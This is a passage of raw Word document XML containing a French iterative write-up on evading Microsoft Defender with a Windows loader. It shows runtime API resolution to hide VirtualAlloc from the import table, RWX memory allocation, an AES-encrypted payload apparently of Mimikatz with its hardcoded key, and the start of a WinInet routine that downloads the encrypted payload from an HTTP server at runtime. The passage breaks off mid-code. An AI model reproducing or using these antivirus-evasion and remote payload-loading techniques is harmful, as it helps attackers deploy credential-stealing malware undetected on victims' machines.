          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("kernel32.dll"), "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F87D738"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LPVOID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0958549E" w14:textId="77777777" w:rsidR="000C1804" w:rsidRPr="00E61249" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB2D9A3" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le linker ne voit plus d'appel direct à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, donc il ne l'ajoute pas dans l'IAT. Seules </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetModuleHandleA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> restent dans l'IAT, ce qui est commun à quasiment tous les programmes Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14540A73" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En pratique, on crée un header </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>resolve.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> qui centralise la résolution de toutes les fonctions suspectes au début du </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Chaque fonction est définie via un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typedef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, stockée dans un pointeur global, et résolue au runtime via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Le reste du code utilise ces pointeurs au lieu des appels directs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77219525" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Résultat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63B58F" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Après recompilation avec OLLVM, l'IAT ne contient plus les fonctions suspectes. Mais Defender détecte toujours le binaire. Le problème s'est déplacé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32391860" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Itération 2 : le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> embarqué</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368E427" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> chiffré en AES-256 est embarqué dans la section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> du loader via le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mimi.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Ce fichier contient un tableau de 1.6 MB de bytes chiffrés :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A059EBB"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unsigned char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEBuff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1639440] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A761B9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x05, 0x05, 0xCD, 0xE5, 0x0F, 0x52, 0xF6, 0x46, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645CBE5C" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FFCC8D" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74572419" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le modèle ML de Defender détecte l'entropie anormalement élevée de cette section. Un bloc de 1.6 MB de données aléatoires dans un exécutable est un indicateur classique de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> chiffré.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E10BBFB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correction : téléchargement du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> au runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73087169" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Au lieu d'embarquer le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans le binaire, on le télécharge depuis un serveur HTTP au moment de l'exécution. Le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mimi.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est remplacé par un header qui ne contient que la clé de déchiffrement (16 bytes) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3B232"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mimi_key.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1107F51E"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unsigned char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyBuff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79534847"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0x74, 0x69, 0x02, 0x0D, 0x9F, 0x7A, 0x8F, 0x57,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B08B778" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x38, 0xC6, 0xBC, 0xA1, 0x21, 0x9C, 0x00, 0x5F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68732AD1" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E84EB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#define PAYLOAD_SIZE 1639440</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E01E9" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1C3FFA" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> chiffré est extrait dans un fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>payload.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hébergé sur un serveur HTTP. Le loader le télécharge via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinInet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (résolu dynamiquement, comme les autres APIs) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF4F14"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BOOL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DownloadPayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">const char* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2119BCCF"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HINTERNET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hInternet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InternetOpenA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Mozilla/5.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736D257E"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INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D4439E0"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HINTERNET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InternetOpenUrlA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
